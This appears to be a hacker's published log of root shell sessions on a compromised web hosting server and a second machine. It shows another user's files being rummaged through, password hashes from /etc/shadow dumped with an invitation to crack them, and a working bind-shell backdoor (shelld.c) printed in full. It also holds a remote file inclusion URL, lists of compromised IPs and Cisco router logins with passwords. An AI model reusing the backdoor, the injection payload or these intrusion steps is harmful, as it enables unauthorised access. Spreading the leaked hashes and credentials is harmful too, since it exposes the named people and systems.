spamd child root 26883 0.0 2.1 23792 22088 ? SN 00:42 0:01 spamd child root 26884 0.0 2.0 23356 21636 ? SN 00:42 0:01 spamd child root 26885 0.0 2.1 23592 21836 ? SN 00:42 0:01 spamd child mysql 31311 0.0 7.8 93980 81004 ? SN 01:01 0:02 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock bmxer103 15326 0.0 0.1 7108 1940 ? SN 01:34 0:00 pure-ftpd (IDLE) nobody 26943 0.1 1.7 20584 18176 ? SN 02:11 0:03 /usr/local/apache/bin/httpd -DSSL nobody 30140 0.2 1.7 20592 18112 ? SN 02:24 0:02 /usr/local/apache/bin/httpd -DSSL root 30670 0.0 0.1 6616 1932 ? SN 02:26 0:00 /usr/sbin/exim -q root 31837 0.1 0.0 1532 416 ? SN 02:27 0:01 [bdflush] root 3275 0.0 0.0 2180 1016 ? SN 02:35 0:00 inetd root 5468 0.0 0.1 6868 2012 ? SN 02:41 0:00 sshd: rpm [priv] rpm 5506 0.0 0.2 7016 2304 ? SN 02:41 0:00 sshd: rpm@pts/2 rpm 5507 0.0 0.1 5336 1364 pts/2 SN 02:41 0:00 -bash nobody 5644 0.2 1.7 20428 17876 ? SN 02:42 0:00 /usr/local/apache/bin/httpd -DSSL root 5678 0.0 0.1 2184 1216 pts/2 SN 02:42 0:00 k-rad nobody 5995 0.1 1.7 20428 17884 ? SN 02:44 0:00 /usr/local/apache/bin/httpd -DSSL nobody 6070 0.0 1.7 20428 17860 ? SN 02:44 0:00 /usr/local/apache/bin/httpd -DSSL nobody 6107 0.1 1.7 20428 17956 ? SN 02:44 0:00 /usr/local/apache/bin/httpd -DSSL vinniej 6340 0.0 6.7 77676 69456 ? SN 02:44 0:00 cpanellogd - http logs for vinniej vinniej 6360 0.0 0.0 2176 992 ? SN 02:45 0:00 sh -c /usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog +C"IMAGEDIR /images/" +C"DOMAINSFILE /usr/local/cpanel/3rdparty/share/analog/lang/ukdom.t vinniej 6361 0.0 0.0 1524 420 ? SN 02:45 0:00 /usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog +CIMAGEDIR /images/ +CDOMAINSFILE /usr/local/cpanel/3rdparty/share/analog/lang/ukdom.tab +CCHAR mailnull 7849 0.4 0.3 7576 3720 ? SN 02:45 0:00 /usr/sbin/exim -bd -q60m root 7976 5.0 0.3 7696 4104 ? SN 02:46 0:00 /usr/sbin/exim -q mailnull 7977 0.0 0.4 7696 4148 ? RN 02:46 0:00 /usr/sbin/exim -q root 7978 0.0 0.0 2884 892 pts/2 RN 02:46 0:00 ps aux root@panther [/tmp]# cat /etc/passwd | grep killerz killerz:x:32479:32483::/home/killerz:/usr/local/cpanel/bin/noshell // No shell for rotor root@panther [/tmp]# cat /etc/shadow | grep killerz killerz:$1$KcR4KL0s$bHH0lKn5cYW5zMKnhInsh/:12870:::::: // But feel free to crack his password :) root@panther [/home2/killerz]# ls ./ .addon-installlog .contactemail .mailboxlist .neomail-rotor/ .spamkey .trash/ code/ index.html mail/ public_html/ www@ ../ .addonscgi-phpBB .lastlogin .neomail/ .phpchats .sqmaildata/ FreeBSD.png etc/ kscan.c public_ftp/ tmp/ root@panther [/home2/killerz]# ls * FreeBSD.png index.html kscan.c code: ./ ../ coolPHP.txt etc: ./ ../ .imapv4cp5c ftpquota killerz.org/ mail: ./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/ neomail-trash saved-messages sent-mail public_ftp: ./ ../ incoming/ public_html: ./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/ c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/ newlay/ papers/ phpBB/ r00t/ tsniff.txt ../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/ cam2/ code/ electronics/ hawe index_files/ klog.txt netit newss.GIF pastebin/ pics/ scamz/ www-beta .htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/ www: ./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/ c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/ newlay/ papers/ phpBB/ r00t/ tsniff.txt ../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/ cam2/ code/ electronics/ hawe index_files/ klog.txt netit newss.GIF pastebin/ pics/ scamz/ www-beta .htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/ tmp: ./ ../ analog/ awstats/ lastrun lastrun.bw webalizer/ webalizerftp/ root@panther [/home2/killerz]# cd www root@panther [/home2/killerz/www]# ls * 0x41.tgz LOL.html Thumbs.db b4b0.php chat.txt index.php klog.txt netit newss.GIF postinfo.html tsniff.txt FreeBSD.png Scan0007.jpg _vti_inf.html c0n3ct.c hawe kdoor.txt kscan.c netstat.txt pastebin.pl* shelld.c www-beta FreeBSD: ./ ../ FreeBSD-flat.vmdk FreeBSD.png FreeBSD.png.sav FreeBSD.vmdk FreeBSD.vmsn FreeBSD.vmx.sav nvram nvram.sav _private: ./ ../ .htaccess _vti_bin: ./ ../ .htaccess _vti_adm/ _vti_aut/ _vti_cnf: ./ ../ .htaccess _vti_log: ./ ../ .htaccess _vti_pvt: ./ ../ .htaccess .roles access.cnf botinfs.cnf bots.cnf deptodoc.btr doctodep.btr frontpg.lck service.cnf service.grp service.lck service.pwd services.cnf svcacl.cnf writeto.cnf _vti_txt: ./ ../ .htaccess abicons: ./ ava_bart.gif ava_inspector.gif blugr-folder.gif clip.gif error.gif idea.gif nb-blugr-go.gif pixel.gif support.gif wb-left.gif ../ ava_biz_man.gif ava_penguin.gif blugr-folder_new.gif closedfolder.gif find.gif img.gif nb-blugr-login.gif question.gif tongue.gif wb-right.gif 3go.gif ava_blonde.gif ava_poo_bear.gif botleftcorn.gif comp_usr.gif folder.gif index.html nb-blugr-register.gif redarrow.gif top_corner_left.gif wb-top.gif admin.gif ava_brutus.gif ava_popeye.gif botrightcorn.gif curl_footer.gif folderlocked.gif join.gif newmail.wav reload.gif top_corner_right.gif wb-top_left.gif agree.gif ava_duck.gif ava_red_nose.gif bottom.gif curl_header.gif formicons/ line.gif newpost.gif sad.gif topper2.gif wb-top_right.gif angry.gif ava_felix_cat.gif ava_sylvester.gif bottom_corner_left.gif curve_ll.gif go.gif login.gif news-eye.gif search_logo.jpg trans_img.gif who.gif apache/ ava_garfield.gif ava_tweetybird.gif bottom_corner_right.gif curve_lr.gif go32.gif logo.gif news.gif smile.gif turtlegreen.gif yuk.gif arc-left.gif ava_gentleman.gif ava_white_rabbit.gif bottommenu.jpg curve_ul.gif go_btn.gif makeiconlist.pl ntopcorn.gif smile_rotate.gif wb-bottom.gif arc-right.gif ava_girl.gif ava_young_man.gif brownmenu.jpg curve_ur.gif hlbg.gif menubrown.gif ntopcornleft.gif smileb.gif wb-bottom_left.gif ava.txt ava_girl_big_eye.gif avatars.htm bullet.gif dark_folder.gif hline_mblue.gif msg.gif overview.gif spinach.gif wb-bottom_right.gif ava_barney_rubble.gif ava_huckleberryhound.gif blue-green.gif chat.gif disagree.gif htmlarea/ navigate.gif pencil.gif stats.gif wb-center.gif cam2: ./ ../ back.JPG bottom.JPG front.JPG top.JPG cgi-bin: ./ ../ abmasterd/ anyboard.cgi* getinfo.cgi* search.pl code: ./ ../ anon.txt coolPHP.txt kscan.pl cutenews: ./ ../ Copyright.GNU.txt README.htm data/ example1.php example2.php inc/ index.php remember.js search.php show_archives.php show_news.php skins/ ebay: ./ ../ index.html electronics: ./ ../ ps2port/ volt/ fileupload: ./ ../ README.txt fileupload-class.php upload.php uploads/ fuck: ./ ../ kscan.c images: ./ ../ 0day_cat_banner.jpg glowshell.gif index_files: ./ ../ Thumbs.db filelist.xml image001.png image002.jpg irc: ./ ../ .htaccess cgi-bin/ music: ./ ../ Brotha\ Lynch\ Hung\ -\ One\ Nigga\ Dead.mp3 Brotha\ Lynch\ Hung\ -\ Walking\ To\ My\ Funeral.mp3 c0n3ct.c deria.jpg newlay: ./ ../ images/ index.html me.JPG search/ owned: ./ arren.php djwink.php e.php hostile.php kels.php lamerDJWINK* lamerE* lamerHOSTILE* lamerLOCUSTZ* lamerREVIX* lamerSILKK* lamerWARCHILD* nesa.php seattle.php spectre.php ../ badonkadonk.png dog.php escape.php index.html lamerARREN* lamerDOG* lamerESCAPE* lamerKELS* lamerNESA* lamerSEATTLE* lamerSPECTRE* locustz.php revix.php silkk.php warchild.php papers: ./ ../ desolder.txt pastebin: ./ ../ after before catdir/ cats pastes/ phpBB: ./ admin/ common.php db/ extension.inc groupcp.php includes/ language/ memberlist.php posting.php profile.php templates/ viewonline.php ../ cache/ config.php docs/ faq.php images/ index.php login.php modcp.php privmsg.php search.php viewforum.php viewtopic.php pics: ./ ../ a3.JPG budz cam/ cross.JPG hk.JPG me.html me.swf meth/ modem.JPG moniter.JPG r0t0r1.JPG r0t0r2.JPG r0t0r3.JPG rotor!.JPG ss/ tower.JPG un4m31.jpg r00t: ./ ../ shadow scamz: ./ ../ lez/ ~techg0d: ./ ../ AddonsForWebsites/ ircd/ tutorials/ root@panther [/home2/killerz/www]# cd code/ root@panther [/home2/killerz/www/code]# ls ./ ../ anon.txt coolPHP.txt kscan.pl root@panther [/home2/killerz/www/code]# cat anon.txt #!/usr/bin/perl # (C) rotor 2004 - 2005 # http://www.killerz.org # irc.killerz.org | rotor@killerz.org # Script to send anonoymous mail use Getopt::Std; use IO::Socket; getopt('hupfm', \%opts); if (@ARGV == $opts{h}) { print("$0 (C) rotor 2004 - 2005\n"); print("http://www.killerz.org \n"); print("$0 Help: \n"); print("-u help \n"); print("-h server \n"); print("-p port \n"); print("-f sender \n"); print("-m msg \n"); exit } $server = $opts{h}; # SMPT server $port = $opts{p}; # SMPT server port $sender = $opts{f}; # MAIL from $recip = $opts{r}; # recipient $msg =$opts{m}; #msg my $sock = IO::Socket::INET->new(PeerAddr => "$server ", PeerPort => "$port ", Proto => "tcp") or die "Cannot connect to host\n"; print("Decalre were email is sending from\n"); print $sock "HELO localhost\n"; sleep(1); print("Giving email address from\n"); print $sock "MAIL FROM: $sender\n"; sleep(1); print("Recipients address\n"); print $sock "RCPT TO: $recip\n"; sleep(1); print("Sending cmd for msg compose\n"); print $sock "DATA\n"; print("Sending Subject\n"); print("Enter Subject:"); $sub=; print $sock "Subject: $sub\n"; print("Sending msg\n"); print $sock "$msg\n"; root@panther [/home2/killerz/www/code]# cat kscan.pl #!/usr/bin/perl ## ## killer-scan.pl (C) rotor 2005 - 2006 ## rotor@killerz.org || http://www.killerz.org use IO::Socket; use strict; my($port,$pstart,$pstop,$sock); my $host = shift || 127.0.0.1; $pstart = 1; $pstop = 22; for($port=$pstart;$port<=$pstop;$port++){ $sock = IO::Socket::INET->new("$host:$port") || next; print "[ks] $port open on $host [ks]\n"; close($sock); } root@panther [/home2/killerz/www]# cat kscan.c /* * kscan.c (C) rotor 2005 - 2006 * rotor@killerz.org * http://www.killerz.org * http://dynamichell.com */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define STARTP 1 #define ENDP 1024 #define GREEN "\E[32m" #define RED "\E[31m" int sock, i; int StartP, EndP; struct sockaddr_in addr; struct hostent *h; struct servent *s; int check(int port); int usage(char *); int main(int argc, char *argv[]) { if(argc < 2) { usage(argv[0]); } if(strcmp(argv[2], "-")==0 && strcmp(argv[3], "-")==0) { StartP = (int)STARTP; EndP = (int)ENDP; } else { StartP = atoi(argv[2]); EndP = atoi(argv[3]); } if(StartP > EndP) { printf(RED "Error: Start port is higher then end port\n"); usage(argv[0]); } if ((h=gethostbyname(argv[1])) == NULL){ printf(RED "Cant reolve host\n"); usage(argv[0]); } printf(GREEN "Scanning Host %s from %s to %s \n",argv[1],STARTP,ENDP); for(i=STARTP; i <= ENDP; i++) { if (check(i)==0) { h=getservbyport(htons(i),"tcp"); printf(GREEN "Port %d is open \n",i); } close(sock); } return 0; } int usage(char *Progname) { printf(GREEN "%s (C) rotor 2005 - 2006\n",Progname); printf(RED "Usage: %s [host] [start-port] [end-port]\n",Progname); exit(1); } int check(int port) { if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("socket"); exit; } addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr = *((struct in_addr *)h->h_addr); if((connect(sock,(struct sockaddr *) &addr, sizeof(addr)))==0) return 0; else return 1; } root@panther [/home2/killerz/www]# cat shelld.c #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void startdaemon (void); int main (int argc, char *argv[]) { int sock, csock, l; struct sockaddr_in caddr; startdaemon (); if ((sock = create_server (9999)) == -1) { // change to stdout so we can see it from PHP!!@!@ fprintf (stderr, "create_server FAIL\n"); exit (-1); } // stop zombies signal (SIGCHLD, SIG_IGN); while (1) { l = sizeof (struct sockaddr_in); if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1) { perror ("accept()"); exit (-1); } { int optval = 1; ioctl (sock, FIONBIO, &optval); } fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr)); switch (fork ()) { case -1: perror ("fork()"); exit (1); case 0: /* child */ /* maybe idle timeout ? */ // THIS IS GHETTO BUT FUCK IT I DONT REMEMBER HOWTO CODE PROPERLY. write (csock, "B4B0 ownz you - chrak\r\n", strlen ("B4B0 ownz you - chrak\r\n")); { char *args[] = { "/bin/sh", "-c", "/bin/sh", NULL }, *env[] = { "PATH=/usr/local/sbin:/usr/sbin:/sbin" ":/usr/local/bin:/usr/bin:/bin:.", NULL}; close (0); close (1); close (2); dup2 (csock, 0); dup2 (csock, 1); dup2 (csock, 2); execve ("/bin/bash", args, env); } close (csock); exit (0); default: /* parent */ close (csock); } } } void startdaemon (void) { switch (fork ()) { case -1: perror ("fork()"); exit (1); case 0: /* child */ break; default: /* parent */ exit (0); } if (setsid () == -1) { perror ("setsid()"); exit (1); } //fclose(stdin); //fclose(stdout); } int create_server (unsigned int port) { int sock, l = 1; struct sockaddr_in saddr; if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); return -1; } setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int)); saddr.sin_family = AF_INET; saddr.sin_port = htons (port); saddr.sin_addr.s_addr = INADDR_ANY; if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) { perror ("bind()"); return -1; } /* only 5 connection at a time heh!@ */ if (listen (sock, 5) == -1) { perror ("listen()"); return -1; } return sock; } /* http://www.franchiseoutlet.com/us/about.php?page=http://www.learnandteachonline.com/p hp.txt?&cmd=ls%20/ */ root@panther [/home/killerz]# cd mail/ root@panther [/home/killerz/mail]# ls ./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/ neomail-trash saved-messages sent-mail root@panther [/home/killerz/mail]# cd killerz.org/ root@panther [/home/killerz/mail/killerz.org]# ls ./ ../ rotor/ root@panther [/home/killerz/mail/killerz.org]# cd rotor/ root@panther [/home/killerz/mail/killerz.org/rotor]# ls ./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox sent-mail root@panther [/home/killerz/mail/killerz.org/rotor]# cat inbox root@panther [/home/killerz/mail/killerz.org/rotor]# cat sent-mail From MAILER-DAEMON Tue Jan 11 15:15:19 2005 Date: 11 Jan 2005 15:15:19 -0800 From: Mail System Internal Data Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA X-IMAP: 1105485319 0000000000 Status: RO This text is part of the internal format of your mail folder, and is not a real message. It is created automatically by the mail system software. If deleted, important folder data will be lost, and it will be re-created with the data reset to initial values. From rotor@panther.unixbsd.info Tue Jan 11 15:15:19 2005 -0800 Status: R X-Status: X-Keywords: Received: from 139.168.150.213 ([139.168.150.213]) by panther.unixbsd.info (IMP) with HTTP for ; Tue, 11 Jan 2005 15:15:19 -0800 Message-ID: <1105485319.41e45e0765a4d@panther.unixbsd.info> Date: Tue, 11 Jan 2005 15:15:19 -0800 From: rotor@killerz.org To: presonic@gmail.com Subject: ircbot MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit User-Agent: Internet Messaging Program (IMP) 3.2.2 X-Originating-IP: 139.168.150.213 root@panther [/home/killerz/mail/killerz.org/rotor]# ls ./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox sent-mail root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.s cat: INBOX.s: No such file or directory root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.Sent From MAILER-DAEMON Mon Jan 10 01:02:29 2005 Date: 10 Jan 2005 01:02:29 -0800 From: Mail System Internal Data Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA X-IMAP: 1105347749 0000000000 Status: RO This text is part of the internal format of your mail folder, and is not a real message. It is created automatically by the mail system software. If deleted, important folder data will be lost, and it will be re-created with the data reset to initial values. root@panther [/home/killerz]# cd etc/killerz.org/ passwd passwd,v quota quota,v shadow shadow,v root@panther [/home/killerz]# cd etc/killerz.org/ root@panther [/home/killerz/etc/killerz.org]# ls ./ ../ passwd passwd,v quota quota,v shadow shadow,v root@panther [/home/killerz/etc/killerz.org]# cat * rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell head 1.3; access; symbols; locks killerz:1.3; strict; comment @# @; 1.3 date 2005.01.10.03.01.21; author killerz; state Exp; branches; next 1.2; 1.2 date 2005.01.10.03.01.20; author killerz; state Exp; branches; next 1.1; 1.1 date 2004.12.17.12.19.04; author killerz; state Exp; branches; next ; desc @Init by cpanel-email: args hidden @ 1.3 log @Modified by cpanel-email: args hidden. @ text @rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell @ 1.2 log @Modified by cpanel-email: args hidden. @ text @d1 1 @ 1.1 log @Initial revision @ text @a0 1 rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell @ rotor:10485760 head 1.3; access; symbols; locks killerz:1.3; strict; comment @# @; 1.3 date 2005.01.10.03.01.21; author killerz; state Exp; branches; next 1.2; 1.2 date 2005.01.10.03.01.20; author killerz; state Exp; branches; next 1.1; 1.1 date 2004.12.17.12.19.04; author killerz; state Exp; branches; next ; desc @Init by cpanel-email: args hidden @ 1.3 log @Modified by cpanel-email: args hidden. @ text @rotor:10485760 @ 1.2 log @Modified by cpanel-email: args hidden. @ text @d1 1 @ 1.1 log @Initial revision @ text @a0 1 rotor:10485760 @ rotor:$1$LXus42oY$ji4FpxrSMSkFVfw0OZer5/::::::: head 1.3; access; symbols; locks killerz:1.3; strict; comment @# @; 1.3 date 2005.01.10.03.01.21; author killerz; state Exp; branches; next 1.2; 1.2 date 2005.01.10.03.01.20; author killerz; state Exp; branches; next 1.1; 1.1 date 2004.12.17.12.19.04; author killerz; state Exp; branches; next ; desc @Init by cpanel-email: args hidden @ 1.3 log @Modified by cpanel-email: args hidden. @ text @rotor:$1$LXus42oY$ji4FpxrSMSkFVfw0OZer5/::::::: @ 1.2 log @Modified by cpanel-email: args hidden. @ text @d1 1 @ 1.1 log @Initial revision @ text @a0 1 rotor:$1$Ttync3Vr$.Jm3t1eoPrfUOFLo1xwNX1::::::: @ root@panther [/home/killerz/etc/killerz.org]# exit ## I guess that took care of rotor. He pays for that shell and doesnt even have shell.. ## Life is truly sad.. ## Well enough talking its time to explore matts.homeunix.net.. I have a feeling this one might be very interesting [4] I think this is west's box.. He keeps all of his private shit here ssh -l rotor matts.homeunix.net rotor@matts.homeunix.net's password: Last login: Thu Apr 7 04:04:39 2005 from 203-206-252-62. FreeBSD 5.3-RELEASE-p7 (SENTINEL) #2: Mon Apr 4 21:43:16 PDT 2005 AUTHORIZED USE ONLY Welcome to the ____ _____ _ _ _____ ___ _ _ _____ _ / ___|| ____| \ | |_ _|_ _| \ | | ____| | \___ \| _| | \| | | | | || \| | _| | | ___) | |___| |\ | | | | || |\ | |___| |___ |____/|_____|_| \_| |_| |___|_| \_|_____|_____|.pcinetworks.net Enjoy your stay News: 03/10/05 IPv6 working... and Vhosts. Type vhosts to view them... If you're new to this box, change your damn default pw i gave you.. if i crack your pw, you get disabled for a week... i crack the pw list every week.. to get vhosts, type 'vhosts' lq(rotor@Sentinel.homeunix.net) mq(~)-> ls ./ .cshrc .mail_aliases .rhosts aolup.bx cyp/ dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA lamerSILKK locustz.php revix.php spectre.php ../ .login .mailrc .shrc arren.php cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php .BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ lamerSEATTLE lamerWARCHILD own/ silkk.php (rotor@Sentinel.homeunix.net) mq(~)-> uname -a; id FreeBSD Sentinel.homeunix.net 5.3-RELEASE-p7 FreeBSD 5.3-RELEASE-p7 #2: Mon Apr 4 21:43:16 PDT 2005 west@Sentinel.homeunix.net:/usr/src/sys/i386/compile/SENTINEL i386 uid=1014(rotor) gid=1014 groups=1014 lq(rotor@Sentinel.homeunix.net) mq(~)-> cat .ssh/known_hosts zoopile.com,24.60.126.50 ssh-dss AAAAB3NzaC1kc3MAAACBAPH7U1sa+05gcMO5/5DTl9MEsqivT0qJdWQ2iwpo9eBOhECED03oA4i4Z6MkL6pfXali1p2YUayEsi3uHj0D7ijr9j84S7lpVJMrC/GKc3iqZv01PL8UrYlymcS6s8KrQT5QRoYTq6EmyNghcTXCn3qsHnBZ+bOpEa0O7SM9vHlfAAAAFQDXB7/fpKUbGLBe7kBoIuugrZysGQAAAIBWG7tIgCTFNmpT1zu2AfItEAnZNkPY1GsKoY+Wogz9tXsk7Y4cqA4E2DvWVsC3aASKEqeDauv6+nZIHLscvJ/oqOycWiJjH4X9QN6Rx+ZTVqv/j+CVWugT8TG+dlAjINvu/mfnd3FveBWgBgYHJ5cSgdq4HIHxtSUUEq9q10oIdgAAAIAAvRGvBVqS+VFhq+QPRlc2jEfGQH3g6zIOhwePEeLXAwem4uJYqBsMMyY+tRF9ElEuW87OAPK1pHSX+iOM01JBQbAwE8FnteQ/Ulj2le/7VU6nSNBgXUMB/7xIb95Sn+SOID/nx1LZ2BCIU8f95NIvRQRytAPgUQu+jBKdx1XW4A== segmentation-fault.net,68.98.176.120 ssh-dss AAAAB3NzaC1kc3MAAACBAKB7sr+8e9KsJNNopl+OkfrLvwuD/BEybTb93sbZyZnPMbXBkVcEOostWAZCS4VuI0GsmNLm182L7MAOrzmLWh614SAGeAAhXDJDFd7DUNvV8ER+vqSSDxsMM9CfKxwsdaRE2UhWfJp893//rX6/+131mGyl4KzB0SORfLsfMYzrAAAAFQCqNCbHJEk1KhBdJr+Cb1PuF4z39QAAAIBVEIHOzSh7XKcssrLR7Xgu2Embnvlyub18VRyF8vwpG/VxzM4R1v6kjuVYEsEXvX55aGa8y0Jq8QY/W0uF1bH0o1dMjVj6N+533ex8AgVCKbrZ4L50nvBIuoGWhHfRTtXi1i9zFzDmpmrccuINDmx3Z+XFF4GgEVkewPCZ/oRf3QAAAIEAky7TJb+xSp39Sn+2lggXL1Y3zm2hvWokamUunmiklo+ojS5NjErxN2R7wgGKjKP/9LObwP3hu/eHZfYFgp8dIgKLyUDlnBZGFLCzk+5JIpJM9x76qqpMgOS8n11cVmAeFYCZJICzpRysac4MyEjTpw+XAng33293Nih7m9bRUqA= 66.139.78.11 1024 41 104815528740090300232762682062148731692345617648761884893144749702438178716507602106384467348442332555726272229905090060865518152094220166348851874522827117669256069180699567468232805547620203421525417575684002027686936703327559508891840428578000903598085456851354927023314524854708653799840391129004567592229 cserverz.com,67.18.187.218 ssh-dss AAAAB3NzaC1kc3MAAACBAKCIzY/RIptsfWxt5WPOXk5TnoMG14VNdhXu0h1NRTIU0U+5SOxSMZNKWnDOiJbx2TC6nNKIY+srGIVxLDTL/SSFNvdaLwhrKnQEQTyPL9YewXRaaUP1XND83ETzc5jVZxExticAaisaVeB8QdKETfjD9D7NzN3jr3Nr7xRyOt+tAAAAFQCtxMcM60SLmetmFwGyYQStCGY6vwAAAIEAkOG+5HSQfKU7X14HlDRSL6t14DPKPj5Xjso0BYdA+3GZ4+HlhH79BJiug7pNUFX1sESZxL8W7fe5AYEasd2LG6E3fvFbpgBWsqVRRLAdPiGy2h3HdMs3MCtVLGSuL6QJQC0RLcEF9TeWg9MAuIUm8FsXP/+/69xPFR4DmwkZIF8AAACBAJu46dAQ+dmxLIOKAUm9XU9WcrIlmccXoFF/OJ0iysignedarcL8NCW1zdH823hXCU/e5U5VbKYjEkOoHUfU03JAbQnW7S7nkuym91O5a8gUx0uB7I6TfpuqgF2MoP3jbirZYT67l4mmrsR+19DQkhNZFvoJpQNSsBQMoQAyO7+J cappa.kicks-ass.net,69.17.187.156 ssh-dss AAAAB3NzaC1kc3MAAACBAP/3yV92Esyb8Plbc8OqE4AQI9ASC69yZrcWj1Co0yBiIJSvpvnmyE1soyNPXi79OUcK/9MNAw26AreGdk8pIBvfw9r2nrDb/G5RgZeagybl+5SwRJJbS/kM/SaLYv9BxjzfvBgrnh0SVliJdRNxXTwVXg2WbBFoHH6cxV2++UIfAAAAFQDKLR5ilWYPN2QmY88tIkJj7O6xtwAAAIEAnPm1735i744Oi0YoOwLRkFIyHrfbO0DYhN/I2+ahC5WnETyBgg36r+Gp8KxGmnT9pFYVmvJYL/a0vcc7zMoylk+ijUGKeiQ/GlMzLWei0ELGFGiUFprC8lKhVRity46hH0gRtSLudI1psDqthLKtVdxorLjhPok11l5S2rMIreUAAACAcZOO7w8RMEbVXMLc6FxmhfwHBmUq4wSTQ491+XVa7VwFB825rBJ//ONXzwi43CPLQPOYXiZED+9ToFRIuN/+1vIvaheCeVT/zbJXdbiYVG3lLYJpzHgT8HiVDcyqn1XimMU5U4/qLgqDPxlfJWc+wImISL0lw0Qevi1aS3CHxqU= cappa.kicks.ass.net,64.15.205.202 ssh-dss AAAAB3NzaC1kc3MAAACBAOtzWiwjm6Igblec4brkI/7/71jC6WFyKmQXs8hV3XWuFhBXsMEGyibVKGMtCi7A4tkpu4MywK46NY/z5qehLuWTpcB7+u0TVahzUUsSgEwJte0QiyVdERRfq4b/vEeOMzPcHXLoqE14trBpINaT0MgPHicxeYOoFJECGprQ9d0bAAAAFQDOv6FuT2InFrcf1VAtbmdk3NzQgQAAAIEA5OJd123ZHu9YoWqRHZH7sbvjwZ/wSo1nw6LK44HD2fgY3GwVbN4gLxv4iLbmTQjOdM39B8fdUG2BHXvo2ObZZJELggd6lK/l9rUDmbwLIz6Eu09oHMKWEn8wuLMECVb6LLz76yI7s8eUFFSAQYhqZODsLlLmAazHaud2eMFpbq0AAACBAOWe3dieZLlcZrTfzLnTyYq8ZvypZIBKmM0jqMJzI2eHSMtN9DsvB0WU6TloGq+7twlN1FQRqBb8aj0gAahrn6kFhihsrk9OU1zhH7QACF/oPDSOOIDXdJ0snEQdZsdsIJkC8S+vio9/9g4dzdHpjCc5EwJtKQ6jSbK3qhUDL55Y lq(rotor@Sentinel.homeunix.net) mq(~)-> cd own/ lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls ./ arren.php djwink.php e.php hostile.php kels.php lamerDJWINK lamerE lamerHOSTILE lamerLOCUSTZ lamerREVIX lamerSILKK lamerWARCHILD nesa.php seattle.php spectre.php ../ badonkadonk.png dog.php escape.php index.html lamerARREN lamerDOG lamerESCAPE lamerKELS lamerNESA lamerSEATTLE lamerSPECTRE locustz.php revix.php silkk.php warchild.php lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat lamer* 82.96.75.4 69.175.61.131 64.231.24.208 69.30.127.50 64.171.15.120 24.10.182.92 82.40.95.54 69.30.127.50 64.231.24.208 lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat arren.php Ass for Days! lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cd .. lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls ./ .cshrc .mail_aliases .rhosts aolup.bx cyp/ dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA lamerSILKK locustz.php revix.php spectre.php ../ .login .mailrc .shrc arren.php cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php .BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ lamerSEATTLE lamerWARCHILD own/ silkk.php ## hmm.. Im disapointed.. but wait lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cd " " ## Wow thats skills... lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls cisco cisco2 ddoslog legit list more-cisco owned usable ## ok this just got interesting. lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat cisco* 200.68.58.33 66.38.132.185 200.78.145.114 200.78.154.34 200.78.162.1 200.78.242.185 200.45.170.81 200.45.173.33 200.101.84.198 login 4490@brt enable: rotor 200.78.5.16 200.45.67.209 login cisco enable: cisco 200.32.71.114 200.32.71.174 200.32.91.198 200.32.102.66 200.32.125.4 200.32.126.34 200.20.0.227 200.20.92.82 